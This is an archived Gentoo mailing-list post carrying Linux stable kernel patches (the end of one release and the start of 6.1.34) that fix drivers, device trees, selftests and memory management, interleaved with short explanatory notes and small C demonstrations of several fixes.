+--- a/tools/gpio/lsgpio.c
++++ b/tools/gpio/lsgpio.c
+@@ -94,7 +94,7 @@ static void print_attributes(struct gpio_v2_line_info *info)
+ 	for (i = 0; i < info->num_attrs; i++) {
+ 		if (info->attrs[i].id == GPIO_V2_LINE_ATTR_ID_DEBOUNCE)
+ 			fprintf(stdout, ", debounce_period=%dusec",
+-				info->attrs[0].debounce_period_us);
++				info->attrs[i].debounce_period_us);
+ 	}
+ }
+ 
+diff --git a/tools/testing/selftests/gpio/gpio-sim.sh b/tools/testing/selftests/gpio/gpio-sim.sh
+index 341e3de008968..bf67b23ed29ac 100755
+--- a/tools/testing/selftests/gpio/gpio-sim.sh
++++ b/tools/testing/selftests/gpio/gpio-sim.sh
+@@ -389,6 +389,9 @@ create_chip chip
+ create_bank chip bank
+ set_num_lines chip bank 8
+ enable_chip chip
++DEVNAME=`configfs_dev_name chip`
++CHIPNAME=`configfs_chip_name chip bank`
++SYSFS_PATH="/sys/devices/platform/$DEVNAME/$CHIPNAME/sim_gpio0/value"
+ $BASE_DIR/gpio-mockup-cdev -b pull-up /dev/`configfs_chip_name chip bank` 0
+ test `cat $SYSFS_PATH` = "1" || fail "bias setting does not work"
+ remove_chip chip
+diff --git a/tools/testing/selftests/net/forwarding/hw_stats_l3.sh b/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
+index 9c1f76e108af1..1a936ffbacee7 100755
+--- a/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
++++ b/tools/testing/selftests/net/forwarding/hw_stats_l3.sh
+@@ -84,8 +84,9 @@ h2_destroy()
+ 
+ router_rp1_200_create()
+ {
+-	ip link add name $rp1.200 up \
+-		link $rp1 addrgenmode eui64 type vlan id 200
++	ip link add name $rp1.200 link $rp1 type vlan id 200
++	ip link set dev $rp1.200 addrgenmode eui64
++	ip link set dev $rp1.200 up
+ 	ip address add dev $rp1.200 192.0.2.2/28
+ 	ip address add dev $rp1.200 2001:db8:1::2/64
+ 	ip stats set dev $rp1.200 l3_stats on
+@@ -256,9 +257,11 @@ reapply_config()
+ 
+ 	router_rp1_200_destroy
+ 
+-	ip link add name $rp1.200 link $rp1 addrgenmode none type vlan id 200
++	ip link add name $rp1.200 link $rp1 type vlan id 200
++	ip link set dev $rp1.200 addrgenmode none
+ 	ip stats set dev $rp1.200 l3_stats on
+-	ip link set dev $rp1.200 up addrgenmode eui64
++	ip link set dev $rp1.200 addrgenmode eui64
++	ip link set dev $rp1.200 up
+ 	ip address add dev $rp1.200 192.0.2.2/28
+ 	ip address add dev $rp1.200 2001:db8:1::2/64
+ }
+diff --git a/tools/testing/selftests/ptp/testptp.c b/tools/testing/selftests/ptp/testptp.c
+index 198ad5f321878..cfa9562f3cd83 100644
+--- a/tools/testing/selftests/ptp/testptp.c
++++ b/tools/testing/selftests/ptp/testptp.c
+@@ -502,11 +502,11 @@ int main(int argc, char *argv[])
+ 			interval = t2 - t1;
+ 			offset = (t2 + t1) / 2 - tp;
+ 
+-			printf("system time: %lld.%u\n",
++			printf("system time: %lld.%09u\n",
+ 				(pct+2*i)->sec, (pct+2*i)->nsec);
+-			printf("phc    time: %lld.%u\n",
++			printf("phc    time: %lld.%09u\n",
+ 				(pct+2*i+1)->sec, (pct+2*i+1)->nsec);
+-			printf("system time: %lld.%u\n",
++			printf("system time: %lld.%09u\n",
+ 				(pct+2*i+2)->sec, (pct+2*i+2)->nsec);
+ 			printf("system/phc clock time offset is %" PRId64 " ns\n"
+ 			       "system     clock time delay  is %" PRId64 " ns\n",
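
The testptp change pads the nanosecond field to nine digits; without the width, 5000 ns prints as ".5000" and reads as half a second. A two-line demonstration:

    #include <stdio.h>

    int main(void)
    {
        long long sec = 12;
        unsigned nsec = 5000;

        printf("broken: %lld.%u\n", sec, nsec);    /* 12.5000 - ambiguous */
        printf("fixed:  %lld.%09u\n", sec, nsec);  /* 12.000005000 */
        return 0;
    }
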
+diff --git a/tools/testing/selftests/tc-testing/config b/tools/testing/selftests/tc-testing/config
+index 4638c63a339ff..aec4de8bea78b 100644
+--- a/tools/testing/selftests/tc-testing/config
++++ b/tools/testing/selftests/tc-testing/config
+@@ -6,6 +6,7 @@ CONFIG_NF_CONNTRACK_MARK=y
+ CONFIG_NF_CONNTRACK_ZONES=y
+ CONFIG_NF_CONNTRACK_LABELS=y
+ CONFIG_NF_NAT=m
++CONFIG_NETFILTER_XT_TARGET_LOG=m
+ 
+ CONFIG_NET_SCHED=y
+ 
+diff --git a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
+index ba2f5e79cdbfe..e21c7f22c6d4c 100644
+--- a/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
++++ b/tools/testing/selftests/tc-testing/tc-tests/qdiscs/sfb.json
+@@ -58,10 +58,10 @@
+         "setup": [
+             "$IP link add dev $DUMMY type dummy || /bin/true"
+         ],
+-        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root sfb db 10",
++        "cmdUnderTest": "$TC qdisc add dev $DUMMY handle 1: root sfb db 100",
+         "expExitCode": "0",
+         "verifyCmd": "$TC qdisc show dev $DUMMY",
+-        "matchPattern": "qdisc sfb 1: root refcnt [0-9]+ rehash 600s db 10ms",
++        "matchPattern": "qdisc sfb 1: root refcnt [0-9]+ rehash 600s db 100ms",
+         "matchCount": "1",
+         "teardown": [
+             "$TC qdisc del dev $DUMMY handle 1: root",
+diff --git a/tools/testing/selftests/tc-testing/tdc.sh b/tools/testing/selftests/tc-testing/tdc.sh
+index afb0cd86fa3df..eb357bd7923c0 100755
+--- a/tools/testing/selftests/tc-testing/tdc.sh
++++ b/tools/testing/selftests/tc-testing/tdc.sh
+@@ -2,5 +2,6 @@
+ # SPDX-License-Identifier: GPL-2.0
+ 
+ modprobe netdevsim
++modprobe sch_teql
+ ./tdc.py -c actions --nobuildebpf
+ ./tdc.py -c qdisc


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-14 10:17 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-14 10:17 UTC (permalink / raw
  To: gentoo-commits

commit:     0ad3ffd8bf544ac7186139ee99cda33f2f516805
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Wed Jun 14 10:17:43 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Wed Jun 14 10:17:43 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=0ad3ffd8

Linux patch 6.1.34

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1033_linux-6.1.34.patch | 5866 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 5870 insertions(+)

diff --git a/0000_README b/0000_README
index 5b332006..7c3280f5 100644
--- a/0000_README
+++ b/0000_README
@@ -171,6 +171,10 @@ Patch:  1032_linux-6.1.33.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.33
 
+Patch:  1033_linux-6.1.34.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.34
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1033_linux-6.1.34.patch b/1033_linux-6.1.34.patch
new file mode 100644
index 00000000..32aace74
--- /dev/null
+++ b/1033_linux-6.1.34.patch
@@ -0,0 +1,5866 @@
+diff --git a/Documentation/mm/page_table_check.rst b/Documentation/mm/page_table_check.rst
+index 1a09472f10a3c..d19ca356b7bf0 100644
+--- a/Documentation/mm/page_table_check.rst
++++ b/Documentation/mm/page_table_check.rst
+@@ -54,3 +54,22 @@ Build kernel with:
+ 
+ Optionally, build kernel with PAGE_TABLE_CHECK_ENFORCED in order to have page
+ table check support without an extra kernel parameter.
++
++Implementation notes
++====================
++
++We specifically decided not to use VMA information in order to avoid relying on
++MM states (except for limited "struct page" info). The page table check is a
++state machine separate from Linux-MM that verifies that user-accessible
++pages are not falsely shared.
++
++PAGE_TABLE_CHECK depends on EXCLUSIVE_SYSTEM_RAM. The reason is that without
++EXCLUSIVE_SYSTEM_RAM, users are allowed to map arbitrary physical memory
++regions into userspace via /dev/mem. At the same time, pages may change
++their properties (e.g., from anonymous pages to named pages) while they are
++still mapped in userspace, leading to "corruption" detected by the
++page table check.
++
++Even with EXCLUSIVE_SYSTEM_RAM, I/O pages may still be allowed to be mapped via
++/dev/mem. However, these pages are always considered named pages, so they
++won't break the logic used in the page table check.
+diff --git a/Documentation/networking/ip-sysctl.rst b/Documentation/networking/ip-sysctl.rst
+index 4ecb549fd052e..3301288a7c692 100644
+--- a/Documentation/networking/ip-sysctl.rst
++++ b/Documentation/networking/ip-sysctl.rst
+@@ -1247,8 +1247,8 @@ ping_group_range - 2 INTEGERS
+ 	Restrict ICMP_PROTO datagram sockets to users in the group range.
+ 	The default is "1 0", meaning that nobody (not even root) may
+ 	create ping sockets.  Setting it to "100 100" would grant permissions
+-	to the single group. "0 4294967295" would enable it for the world, "100
+-	4294967295" would enable it for the users, but not daemons.
++	to the single group. "0 4294967294" would enable it for the world, "100
++	4294967294" would enable it for the users, but not daemons.
+ 
+ tcp_early_demux - BOOLEAN
+ 	Enable early demux for established TCP sockets.
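
On the ping_group_range correction above: the documented upper bound for "enable for everyone" is 4294967294, presumably because 4294967295 is (gid_t)-1 and never maps to a valid group. A sketch that applies the world-enable range from C (needs root; path and format as documented):

    #include <stdio.h>

    int main(void)
    {
        FILE *f = fopen("/proc/sys/net/ipv4/ping_group_range", "w");

        if (!f) {
            perror("ping_group_range");
            return 1;
        }
        fprintf(f, "0 4294967294\n");   /* every group may create ping sockets */
        fclose(f);
        return 0;
    }
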
+diff --git a/Makefile b/Makefile
+index 6be79c5c934f5..bc7cc17b0e759 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 33
++SUBLEVEL = 34
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/boot/dts/at91-sama7g5ek.dts b/arch/arm/boot/dts/at91-sama7g5ek.dts
+index 3b25c67795ddb..4af8a1c96ed63 100644
+--- a/arch/arm/boot/dts/at91-sama7g5ek.dts
++++ b/arch/arm/boot/dts/at91-sama7g5ek.dts
+@@ -789,7 +789,7 @@
+ };
+ 
+ &shdwc {
+-	atmel,shdwc-debouncer = <976>;
++	debounce-delay-us = <976>;
+ 	status = "okay";
+ 
+ 	input@0 {
+diff --git a/arch/arm/mach-at91/pm.c b/arch/arm/mach-at91/pm.c
+index 60dc56d8acfb9..437dd0352fd44 100644
+--- a/arch/arm/mach-at91/pm.c
++++ b/arch/arm/mach-at91/pm.c
+@@ -334,16 +334,14 @@ static bool at91_pm_eth_quirk_is_valid(struct at91_pm_quirk_eth *eth)
+ 		pdev = of_find_device_by_node(eth->np);
+ 		if (!pdev)
+ 			return false;
++		/* put_device(eth->dev) is called at the end of suspend. */
+ 		eth->dev = &pdev->dev;
+ 	}
+ 
+ 	/* No quirks if device isn't a wakeup source. */
+-	if (!device_may_wakeup(eth->dev)) {
+-		put_device(eth->dev);
++	if (!device_may_wakeup(eth->dev))
+ 		return false;
+-	}
+ 
+-	/* put_device(eth->dev) is called at the end of suspend. */
+ 	return true;
+ }
+ 
+@@ -439,14 +437,14 @@ clk_unconfigure:
+ 				pr_err("AT91: PM: failed to enable %s clocks\n",
+ 				       j == AT91_PM_G_ETH ? "geth" : "eth");
+ 			}
+-		} else {
+-			/*
+-			 * Release the reference to eth->dev taken in
+-			 * at91_pm_eth_quirk_is_valid().
+-			 */
+-			put_device(eth->dev);
+-			eth->dev = NULL;
+ 		}
++
++		/*
++		 * Release the reference to eth->dev taken in
++		 * at91_pm_eth_quirk_is_valid().
++		 */
++		put_device(eth->dev);
++		eth->dev = NULL;
+ 	}
+ 
+ 	return ret;
+diff --git a/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi b/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
+index d7b4229bb4a23..9ad56aaf19b42 100644
+--- a/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8-ss-dma.dtsi
+@@ -26,6 +26,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart0_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart0_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_0 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_0>;
+ 		status = "disabled";
+ 	};
+@@ -36,6 +38,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart1_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart1_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_1 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_1>;
+ 		status = "disabled";
+ 	};
+@@ -46,6 +50,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart2_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart2_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_2 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_2>;
+ 		status = "disabled";
+ 	};
+@@ -56,6 +62,8 @@ dma_subsys: bus@5a000000 {
+ 		clocks = <&uart3_lpcg IMX_LPCG_CLK_4>,
+ 			 <&uart3_lpcg IMX_LPCG_CLK_0>;
+ 		clock-names = "ipg", "baud";
++		assigned-clocks = <&clk IMX_SC_R_UART_3 IMX_SC_PM_CLK_PER>;
++		assigned-clock-rates = <80000000>;
+ 		power-domains = <&pd IMX_SC_R_UART_3>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
+index 9e82069c941fa..5a1f7c30afe57 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-beacon-baseboard.dtsi
+@@ -81,7 +81,7 @@
+ &ecspi2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&pinctrl_espi2>;
+-	cs-gpios = <&gpio5 9 GPIO_ACTIVE_LOW>;
++	cs-gpios = <&gpio5 13 GPIO_ACTIVE_LOW>;
+ 	status = "okay";
+ 
+ 	eeprom@0 {
+@@ -202,7 +202,7 @@
+ 			MX8MN_IOMUXC_ECSPI2_SCLK_ECSPI2_SCLK		0x82
+ 			MX8MN_IOMUXC_ECSPI2_MOSI_ECSPI2_MOSI		0x82
+ 			MX8MN_IOMUXC_ECSPI2_MISO_ECSPI2_MISO		0x82
+-			MX8MN_IOMUXC_ECSPI1_SS0_GPIO5_IO9		0x41
++			MX8MN_IOMUXC_ECSPI2_SS0_GPIO5_IO13		0x41
+ 		>;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+index ce9d3f0b98fc0..607cd6b4e9721 100644
+--- a/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
++++ b/arch/arm64/boot/dts/freescale/imx8qm-mek.dts
+@@ -82,8 +82,8 @@
+ 	pinctrl-0 = <&pinctrl_usdhc2>;
+ 	bus-width = <4>;
+ 	vmmc-supply = <&reg_usdhc2_vmmc>;
+-	cd-gpios = <&lsio_gpio4 22 GPIO_ACTIVE_LOW>;
+-	wp-gpios = <&lsio_gpio4 21 GPIO_ACTIVE_HIGH>;
++	cd-gpios = <&lsio_gpio5 22 GPIO_ACTIVE_LOW>;
++	wp-gpios = <&lsio_gpio5 21 GPIO_ACTIVE_HIGH>;
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi b/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
+index d8ed1d7b4ec76..4b306a59d9bec 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc7180-lite.dtsi
+@@ -16,3 +16,11 @@
+ &cpu6_opp12 {
+ 	opp-peak-kBps = <8532000 23347200>;
+ };
++
++&cpu6_opp13 {
++	opp-peak-kBps = <8532000 23347200>;
++};
++
++&cpu6_opp14 {
++	opp-peak-kBps = <8532000 23347200>;
++};
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index ba684d980cf26..1afc960bab5c9 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -1727,6 +1727,7 @@
+ 			qcom,tcs-config = <ACTIVE_TCS  2>, <SLEEP_TCS   3>,
+ 					  <WAKE_TCS    3>, <CONTROL_TCS 1>;
+ 			label = "apps_rsc";
++			power-domains = <&CLUSTER_PD>;
+ 
+ 			apps_bcm_voter: bcm-voter {
+ 				compatible = "qcom,bcm-voter";
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index 06b9b2f60b9fb..a85bbe28dcf46 100644
+--- a/arch/riscv/Kconfig
++++ b/arch/riscv/Kconfig
+@@ -25,6 +25,7 @@ config RISCV
+ 	select ARCH_HAS_GIGANTIC_PAGE
+ 	select ARCH_HAS_KCOV
+ 	select ARCH_HAS_MMIOWB
++	select ARCH_HAS_NON_OVERLAPPING_ADDRESS_SPACE
+ 	select ARCH_HAS_PTE_SPECIAL
+ 	select ARCH_HAS_SET_DIRECT_MAP if MMU
+ 	select ARCH_HAS_SET_MEMORY if MMU
+diff --git a/arch/riscv/include/asm/pgtable.h b/arch/riscv/include/asm/pgtable.h
+index 2aeaf8e3a4ab0..59bb53da473dd 100644
+--- a/arch/riscv/include/asm/pgtable.h
++++ b/arch/riscv/include/asm/pgtable.h
+@@ -165,8 +165,7 @@ extern struct pt_alloc_ops pt_ops __initdata;
+ 					 _PAGE_EXEC | _PAGE_WRITE)
+ 
+ #define PAGE_COPY		PAGE_READ
+-#define PAGE_COPY_EXEC		PAGE_EXEC
+-#define PAGE_COPY_READ_EXEC	PAGE_READ_EXEC
++#define PAGE_COPY_EXEC		PAGE_READ_EXEC
+ #define PAGE_SHARED		PAGE_WRITE
+ #define PAGE_SHARED_EXEC	PAGE_WRITE_EXEC
+ 
+diff --git a/arch/riscv/mm/init.c b/arch/riscv/mm/init.c
+index 2b9906ed2d1d1..d8d97df801909 100644
+--- a/arch/riscv/mm/init.c
++++ b/arch/riscv/mm/init.c
+@@ -286,7 +286,7 @@ static const pgprot_t protection_map[16] = {
+ 	[VM_EXEC]					= PAGE_EXEC,
+ 	[VM_EXEC | VM_READ]				= PAGE_READ_EXEC,
+ 	[VM_EXEC | VM_WRITE]				= PAGE_COPY_EXEC,
+-	[VM_EXEC | VM_WRITE | VM_READ]			= PAGE_COPY_READ_EXEC,
++	[VM_EXEC | VM_WRITE | VM_READ]			= PAGE_COPY_EXEC,
+ 	[VM_SHARED]					= PAGE_NONE,
+ 	[VM_SHARED | VM_READ]				= PAGE_READ,
+ 	[VM_SHARED | VM_WRITE]				= PAGE_SHARED,
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 1ab41fbca0946..add013d5bbdab 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -685,6 +685,10 @@ static void __blk_mq_free_request(struct request *rq)
+ 	blk_crypto_free_request(rq);
+ 	blk_pm_mark_last_busy(rq);
+ 	rq->mq_hctx = NULL;
++
++	if (rq->rq_flags & RQF_MQ_INFLIGHT)
++		__blk_mq_dec_active_requests(hctx);
++
+ 	if (rq->tag != BLK_MQ_NO_TAG)
+ 		blk_mq_put_tag(hctx->tags, ctx, rq->tag);
+ 	if (sched_tag != BLK_MQ_NO_TAG)
+@@ -696,15 +700,11 @@ static void __blk_mq_free_request(struct request *rq)
+ void blk_mq_free_request(struct request *rq)
+ {
+ 	struct request_queue *q = rq->q;
+-	struct blk_mq_hw_ctx *hctx = rq->mq_hctx;
+ 
+ 	if ((rq->rq_flags & RQF_ELVPRIV) &&
+ 	    q->elevator->type->ops.finish_request)
+ 		q->elevator->type->ops.finish_request(rq);
+ 
+-	if (rq->rq_flags & RQF_MQ_INFLIGHT)
+-		__blk_mq_dec_active_requests(hctx);
+-
+ 	if (unlikely(laptop_mode && !blk_rq_is_passthrough(rq)))
+ 		laptop_io_completion(q->disk->bdi);
+ 
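
The blk-mq hunk moves the RQF_MQ_INFLIGHT accounting into __blk_mq_free_request(), before rq->mq_hctx is cleared, so the decrement still has a valid hctx to act on. The hazard in miniature (invented names):

    #include <stdio.h>

    struct ctx { int active; };
    struct req { struct ctx *ctx; int inflight; };

    static void free_req(struct req *rq)
    {
        if (rq->inflight)
            rq->ctx->active--;  /* must run while rq->ctx is still set */
        rq->ctx = NULL;         /* clearing first would dereference NULL above */
    }

    int main(void)
    {
        struct ctx c = { .active = 1 };
        struct req r = { .ctx = &c, .inflight = 1 };

        free_req(&r);
        printf("active=%d\n", c.active);
        return 0;
    }
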
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index 60aed196a2e54..e009f480675d2 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -1334,14 +1334,30 @@ static bool rbd_obj_is_tail(struct rbd_obj_request *obj_req)
+ /*
+  * Must be called after rbd_obj_calc_img_extents().
+  */
+-static bool rbd_obj_copyup_enabled(struct rbd_obj_request *obj_req)
++static void rbd_obj_set_copyup_enabled(struct rbd_obj_request *obj_req)
+ {
+-	if (!obj_req->num_img_extents ||
+-	    (rbd_obj_is_entire(obj_req) &&
+-	     !obj_req->img_request->snapc->num_snaps))
+-		return false;
++	rbd_assert(obj_req->img_request->snapc);
+ 
+-	return true;
++	if (obj_req->img_request->op_type == OBJ_OP_DISCARD) {
++		dout("%s %p objno %llu discard\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	if (!obj_req->num_img_extents) {
++		dout("%s %p objno %llu not overlapping\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	if (rbd_obj_is_entire(obj_req) &&
++	    !obj_req->img_request->snapc->num_snaps) {
++		dout("%s %p objno %llu entire\n", __func__, obj_req,
++		     obj_req->ex.oe_objno);
++		return;
++	}
++
++	obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+ }
+ 
+ static u64 rbd_obj_img_extents_bytes(struct rbd_obj_request *obj_req)
+@@ -1442,6 +1458,7 @@ __rbd_obj_add_osd_request(struct rbd_obj_request *obj_req,
+ static struct ceph_osd_request *
+ rbd_obj_add_osd_request(struct rbd_obj_request *obj_req, int num_ops)
+ {
++	rbd_assert(obj_req->img_request->snapc);
+ 	return __rbd_obj_add_osd_request(obj_req, obj_req->img_request->snapc,
+ 					 num_ops);
+ }
+@@ -1578,15 +1595,18 @@ static void rbd_img_request_init(struct rbd_img_request *img_request,
+ 	mutex_init(&img_request->state_mutex);
+ }
+ 
++/*
++ * Only snap_id is captured here, for reads.  For writes, the snapshot
++ * context is captured in rbd_img_object_requests() once the exclusive
++ * lock is guaranteed to be held.
++ */
+ static void rbd_img_capture_header(struct rbd_img_request *img_req)
+ {
+ 	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 
+ 	lockdep_assert_held(&rbd_dev->header_rwsem);
+ 
+-	if (rbd_img_is_write(img_req))
+-		img_req->snapc = ceph_get_snap_context(rbd_dev->header.snapc);
+-	else
++	if (!rbd_img_is_write(img_req))
+ 		img_req->snap_id = rbd_dev->spec->snap_id;
+ 
+ 	if (rbd_dev_parent_get(rbd_dev))
+@@ -2233,9 +2253,6 @@ static int rbd_obj_init_write(struct rbd_obj_request *obj_req)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (rbd_obj_copyup_enabled(obj_req))
+-		obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+-
+ 	obj_req->write_state = RBD_OBJ_WRITE_START;
+ 	return 0;
+ }
+@@ -2341,8 +2358,6 @@ static int rbd_obj_init_zeroout(struct rbd_obj_request *obj_req)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (rbd_obj_copyup_enabled(obj_req))
+-		obj_req->flags |= RBD_OBJ_FLAG_COPYUP_ENABLED;
+ 	if (!obj_req->num_img_extents) {
+ 		obj_req->flags |= RBD_OBJ_FLAG_NOOP_FOR_NONEXISTENT;
+ 		if (rbd_obj_is_entire(obj_req))
+@@ -3287,6 +3302,7 @@ again:
+ 	case RBD_OBJ_WRITE_START:
+ 		rbd_assert(!*result);
+ 
++		rbd_obj_set_copyup_enabled(obj_req);
+ 		if (rbd_obj_write_is_noop(obj_req))
+ 			return true;
+ 
+@@ -3473,9 +3489,19 @@ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+ 
+ static void rbd_img_object_requests(struct rbd_img_request *img_req)
+ {
++	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 	struct rbd_obj_request *obj_req;
+ 
+ 	rbd_assert(!img_req->pending.result && !img_req->pending.num_pending);
++	rbd_assert(!need_exclusive_lock(img_req) ||
++		   __rbd_is_lock_owner(rbd_dev));
++
++	if (rbd_img_is_write(img_req)) {
++		rbd_assert(!img_req->snapc);
++		down_read(&rbd_dev->header_rwsem);
++		img_req->snapc = ceph_get_snap_context(rbd_dev->header.snapc);
++		up_read(&rbd_dev->header_rwsem);
++	}
+ 
+ 	for_each_obj_request(img_req, obj_req) {
+ 		int result = 0;
+@@ -3493,7 +3519,6 @@ static void rbd_img_object_requests(struct rbd_img_request *img_req)
+ 
+ static bool rbd_img_advance(struct rbd_img_request *img_req, int *result)
+ {
+-	struct rbd_device *rbd_dev = img_req->rbd_dev;
+ 	int ret;
+ 
+ again:
+@@ -3514,9 +3539,6 @@ again:
+ 		if (*result)
+ 			return true;
+ 
+-		rbd_assert(!need_exclusive_lock(img_req) ||
+-			   __rbd_is_lock_owner(rbd_dev));
+-
+ 		rbd_img_object_requests(img_req);
+ 		if (!img_req->pending.num_pending) {
+ 			*result = img_req->pending.result;
+@@ -3978,6 +4000,10 @@ static int rbd_post_acquire_action(struct rbd_device *rbd_dev)
+ {
+ 	int ret;
+ 
++	ret = rbd_dev_refresh(rbd_dev);
++	if (ret)
++		return ret;
++
+ 	if (rbd_dev->header.features & RBD_FEATURE_OBJECT_MAP) {
+ 		ret = rbd_object_map_open(rbd_dev);
+ 		if (ret)
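
The rbd change above defers capturing the write snapshot context until the exclusive lock is held, reading it under header_rwsem. The "capture shared state only inside the lock" shape, as a pthread sketch (build with -pthread):

    #include <pthread.h>
    #include <stdio.h>

    static pthread_rwlock_t header_lock = PTHREAD_RWLOCK_INITIALIZER;
    static int snap_context = 42;   /* stand-in for rbd_dev->header.snapc */

    static int capture_snapc(void)
    {
        int snapc;

        pthread_rwlock_rdlock(&header_lock);
        snapc = snap_context;       /* snapshot taken at a consistent point */
        pthread_rwlock_unlock(&header_lock);
        return snapc;
    }

    int main(void)
    {
        printf("captured snapc %d\n", capture_snapc());
        return 0;
    }
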
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 7b9fd5f104335..45dffd2cbc719 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -78,7 +78,8 @@ enum qca_flags {
+ 	QCA_HW_ERROR_EVENT,
+ 	QCA_SSR_TRIGGERED,
+ 	QCA_BT_OFF,
+-	QCA_ROM_FW
++	QCA_ROM_FW,
++	QCA_DEBUGFS_CREATED,
+ };
+ 
+ enum qca_capabilities {
+@@ -635,6 +636,9 @@ static void qca_debugfs_init(struct hci_dev *hdev)
+ 	if (!hdev->debugfs)
+ 		return;
+ 
++	if (test_and_set_bit(QCA_DEBUGFS_CREATED, &qca->flags))
++		return;
++
+ 	ibs_dir = debugfs_create_dir("ibs", hdev->debugfs);
+ 
+ 	/* read only */
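
qca_debugfs_init() now guards itself with test_and_set_bit(QCA_DEBUGFS_CREATED, ...) so a repeated hci open cannot create the same debugfs entries twice. The same once-only guard with a C11 atomic flag:

    #include <stdatomic.h>
    #include <stdio.h>

    static atomic_flag created = ATOMIC_FLAG_INIT;

    static void debugfs_init(void)
    {
        /* returns the previous value; true means someone already ran this */
        if (atomic_flag_test_and_set(&created))
            return;
        printf("creating entries\n");   /* runs exactly once */
    }

    int main(void)
    {
        debugfs_init();
        debugfs_init();     /* second call is a no-op */
        return 0;
    }
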
+diff --git a/drivers/firmware/arm_ffa/driver.c b/drivers/firmware/arm_ffa/driver.c
+index 5904a679d3512..c37e823590055 100644
+--- a/drivers/firmware/arm_ffa/driver.c
++++ b/drivers/firmware/arm_ffa/driver.c
+@@ -505,6 +505,7 @@ ffa_setup_and_transmit(u32 func_id, void *buffer, u32 max_fragsize,
+ 		ep_mem_access->flag = 0;
+ 		ep_mem_access->reserved = 0;
+ 	}
++	mem_region->handle = 0;
+ 	mem_region->reserved_0 = 0;
+ 	mem_region->reserved_1 = 0;
+ 	mem_region->ep_count = args->nattrs;
